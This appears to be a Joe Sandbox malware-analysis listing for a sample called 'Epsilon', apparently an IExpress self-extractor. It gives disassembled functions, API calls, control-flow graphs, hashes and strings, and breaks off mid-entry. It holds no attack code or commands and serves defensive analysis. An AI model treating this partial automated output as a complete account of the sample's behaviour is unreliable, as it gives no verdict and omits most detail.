                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                • API String ID: 3010855178-3123416969
                                                                                • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                • Instruction ID: b653d65363001422986f68a937e4ee6ccc557349d3f4b2b0430750437257f9f2
                                                                                • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                                • Instruction Fuzzy Hash: 10714A20E0C64BB6FB60BB11A9542F5EEE0EF88747FC04035D94D42A91DF6CE827A630
                                                                                Function 00007FF7378264E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 597 7ff7378264e4-7ff737826510 598 7ff7378265df-7ff7378265ee 597->598 599 7ff737826516-7ff73782651b call 7ff7378263b8 597->599 600 7ff7378265f1-7ff7378265fb 598->600 604 7ff737826520-7ff737826522 599->604 602 7ff7378265fd-7ff737826603 600->602 603 7ff737826610-7ff73782661b 600->603 602->603 605 7ff737826605-7ff73782660e 602->605 606 7ff73782661e-7ff737826628 call 7ff737826b70 603->606 607 7ff737826688-7ff73782668a 604->607 608 7ff737826528-7ff73782653e 604->608 605->600 605->603 620 7ff73782662a-7ff73782663d CreateDirectoryA 606->620 621 7ff737826649-7ff73782664b 606->621 609 7ff737826698-7ff7378266bc call 7ff737828470 607->609 611 7ff737826541-7ff73782654b 608->611 612 7ff73782654d-7ff737826553 611->612 613 7ff737826560-7ff737826575 611->613 612->613 616 7ff737826555-7ff73782655e 612->616 617 7ff737826577-7ff73782658f GetSystemInfo 613->617 618 7ff7378265cc-7ff7378265dd call 7ff737827ba8 613->618 616->611 616->613 622 7ff7378265bb 617->622 623 7ff737826591-7ff737826594 617->623 618->606 624 7ff73782667d-7ff737826682 call 7ff737827700 620->624 625 7ff73782663f 620->625 626 7ff73782668c-7ff737826693 621->626 627 7ff73782664d-7ff737826655 call 7ff737826ca4 621->627 632 7ff7378265c2-7ff7378265c7 call 7ff737827ba8 622->632 630 7ff7378265b2-7ff7378265b9 623->630 631 7ff737826596-7ff737826599 623->631 624->607 625->621 626->609 639 7ff73782665a-7ff73782665c 627->639 630->632 636 7ff7378265a9-7ff7378265b0 631->636 637 7ff73782659b-7ff73782659e 631->637 632->618 636->632 637->618 640 7ff7378265a0-7ff7378265a7 637->640 639->626 641 7ff73782665e-7ff737826664 639->641 640->632 641->607 642 7ff737826666-7ff73782667b RemoveDirectoryA 641->642 642->607
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782657C
                                                                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782662F
                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF737822CE1), ref: 00007FF73782666F
                                                                                  • Part of subcall function 00007FF7378263B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF737822CE1), ref: 00007FF737826423
                                                                                  • Part of subcall function 00007FF7378263B8: GetFileAttributesA.KERNELBASE ref: 00007FF737826432
                                                                                  • Part of subcall function 00007FF7378263B8: GetTempFileNameA.KERNEL32 ref: 00007FF73782645B
                                                                                  • Part of subcall function 00007FF7378263B8: DeleteFileA.KERNEL32 ref: 00007FF737826473
                                                                                  • Part of subcall function 00007FF7378263B8: CreateDirectoryA.KERNEL32 ref: 00007FF737826484
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                • API String ID: 1979080616-3703068183
                                                                                • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                • Instruction ID: 77d970f0ad6cf33be112bb581fa59680c7f0e8abe5d4ae9ff34a0fac40278749
                                                                                • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                                • Instruction Fuzzy Hash: 0C519161B0D68AA2FB50AF25D9103F9EFA0AF44742FD84135C90D53A95DF7CE427E260
                                                                                Function 00007FF737822C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                • API String ID: 1302179841-1204263913
                                                                                • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                • Instruction ID: 54f302cde6ed34e931790b04e51b9e27ecf77c5756cc3dee63c52a3c4af135e6
                                                                                • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                                • Instruction Fuzzy Hash: 30317132E0C64EB6FB64BB20A4442F5FE90AF54752FC54131D90D122A5CF7CE463A630
                                                                                Function 00007FF73782204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                • String ID:
                                                                                • API String ID: 836429354-0
                                                                                • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                • Instruction ID: 181b02b457421ff57148781c57d2252d439eda3d7de96c1fa07d12a322867563
                                                                                • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                • Instruction Fuzzy Hash: F2519031A0CB89A5EB11AF20D8002F8BBA1FB45B85FC58171DA5E07695DF3CE51BD320
                                                                                Function 00007FF737823910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                • String ID: $Adv
                                                                                • API String ID: 2654313074-3776740653
                                                                                • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                • Instruction ID: 1bd780c471a5d27f7a3652d07ad2e89c953921b6b0ceb826c09d21ea91c9cd3c
                                                                                • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                • Instruction Fuzzy Hash: BC517331A0C64696E7506F11E9542F9FEA1FB8AB96FC49231C90E13B94CF3C9467E720
                                                                                Function 00007FF7378261EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                • API String ID: 3049360512-1423647952
                                                                                • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                • Instruction ID: 4c6f3ca7c8dffe93376bf849a1616d96ddd6b1c1d1a5c9bb9ceddf8e58095035
                                                                                • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                • Instruction Fuzzy Hash: 68511E21A0C68AA6EB10AF14E8543F9FFA0FB85746FC45131CA4D07694CF3DE46AD760
                                                                                Function 00007FF73782473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 3183975587-3916222277
                                                                                • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                • Instruction ID: 5100e637e1df04a86559a7d7dba2b9ed6574f7dc2621c52a33e39f4dc9a70322
                                                                                • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                                • Instruction Fuzzy Hash: F151B43291C689A6F760AB10E4443F9FFA0FB8875AF904135D64D466A4CFBCD856DB30
                                                                                Function 00007FF737822318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                • API String ID: 2209512893-559176071
                                                                                • Opcode ID: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                                                • Instruction ID: 88e6a943f0cdff83ac58d76869f08f80c2786bf2bad326fedf44df7ad6b3b948
                                                                                • Opcode Fuzzy Hash: 9f23079a79aaf393f30d7d52ead263bb4ecc079f7f4d037dad90965ff67e785b
                                                                                • Instruction Fuzzy Hash: A131803260CB49DBD7109F25E8405EAFBA4FB88755F854535EA4D43B64CF38D061DB10
                                                                                Function 00007FF7378263B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                • API String ID: 1082909758-3932986939
                                                                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                • Instruction ID: 167419c7a10c0ec1e576be2db8e936f39b93996968d6141ade4cdaeca72e05b9
                                                                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                • Instruction Fuzzy Hash: 59214C71A0C945A6E710AB12E9503F9FA91EB8EB82FC58130DD4E52791CF3CE457D610
                                                                                Function 00007FF737828200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                • String ID:
                                                                                • API String ID: 2995914023-0
                                                                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                • Instruction ID: 4dffd5ab730f831fab369297c8ceb5a3ff74d43f676fa54a135d2d608a4c60ec
                                                                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                • Instruction Fuzzy Hash: 76516C31A0CA4AA6EB60AB21E8443F5AAE0FF44756FD40531D94D83295DF3DE863F720
                                                                                Function 00007FF7378260A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF737825050: FindResourceExA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825078
                                                                                  • Part of subcall function 00007FF737825050: SizeofResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF737825089
                                                                                  • Part of subcall function 00007FF737825050: FindResourceA.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250AF
                                                                                  • Part of subcall function 00007FF737825050: LoadResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250C0
                                                                                  • Part of subcall function 00007FF737825050: LockResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250CF
                                                                                  • Part of subcall function 00007FF737825050: memcpy_s.MSVCRT ref: 00007FF7378250EE
                                                                                  • Part of subcall function 00007FF737825050: FreeResource.KERNEL32(?,?,00000000,00007FF737822E43), ref: 00007FF7378250FD
                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF737823123), ref: 00007FF7378260C9
                                                                                • LocalFree.KERNEL32 ref: 00007FF737826142
                                                                                  • Part of subcall function 00007FF737824DCC: LoadStringA.USER32 ref: 00007FF737824E60
                                                                                  • Part of subcall function 00007FF737824DCC: MessageBoxA.USER32 ref: 00007FF737824EA0
                                                                                  • Part of subcall function 00007FF737827700: GetLastError.KERNEL32 ref: 00007FF737827704
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                • String ID: $<None>$UPROMPT
                                                                                • API String ID: 957408736-2569542085
                                                                                • Opcode ID: 7026594253a11c1acd4dfce0892b575a0df76811d38349c329356a2fbd3cbb48
                                                                                • Instruction ID: bc81aca8455eb34f192dbc9488016fb61acbb973c2d23a30576301a7957dbadb
                                                                                • Opcode Fuzzy Hash: 7026594253a11c1acd4dfce0892b575a0df76811d38349c329356a2fbd3cbb48
                                                                                • Instruction Fuzzy Hash: 08318271B0C24AA7F7206F20E5547FAFE61FB85786F805134CA0E42A91DF7DE416AB20
                                                                                Function 00007FF737825380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile$lstrcmp
                                                                                • String ID: *MEMCAB
                                                                                • API String ID: 1301100335-3211172518
                                                                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                • Instruction ID: a7e1d9fd297bb5dea1ff717e9a9dcc02c075186db1bab2793dc5e2d544506275
                                                                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                • Instruction Fuzzy Hash: C66122A2A4D74996F7209F14A5843B9BE91FB45B76F844371DA6E426C0CF3CE023A720
                                                                                Function 00007FF7378258B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 1150793416-1193786559
                                                                                • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                • Instruction ID: 55c021de51a8285cba30fd2f6b38bf17fe11a85ab9faef2561c3a3194844d669
                                                                                • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                • Instruction Fuzzy Hash: 1151C532A5EA4AA1EB60AB11E4401FDAF90FF49B52FC45171DA4E432D4CE3CE563D360
                                                                                Function 00007FF737824C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                • String ID:
                                                                                • API String ID: 2212493051-0
                                                                                • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                • Instruction ID: 8c8f70d0e8b2dc8340afec8dff4207b487313dfa343a2be9507195bb4bb01013
                                                                                • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                • Instruction Fuzzy Hash: 9F316F32B186459AE7109B65E8049FDBFA1F749B9AF985130CE0A63B48CF3DE446DB10
                                                                                Function 00007FF737826B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID: TMP4351$.TMP
                                                                                • API String ID: 3494564517-2619824408
                                                                                • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                • Instruction ID: 4805608aba97fd2b8d79d3d1a5992a57f6be5cb8010a16e684e3fad9c7727e59
                                                                                • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                • Instruction Fuzzy Hash: 40318B21A0C68997E710AF21A4143BAFE90FB85BA6F845334DA6E02BD5CF3CD4279710
                                                                                Function 00007FF737825050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3370778649-0
                                                                                • Opcode ID: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
                                                                                • Instruction ID: e902a4779709694bd7be3a88cd277b5e3af84d54edb21e2ba89f58dcdc98263f
                                                                                • Opcode Fuzzy Hash: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
                                                                                • Instruction Fuzzy Hash: 1E115C3170DB8597EB146B62A4040B9FEA0FB4EFC2F899178DD0E93B54DE3CD4529610
                                                                                Function 00007FF737827AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
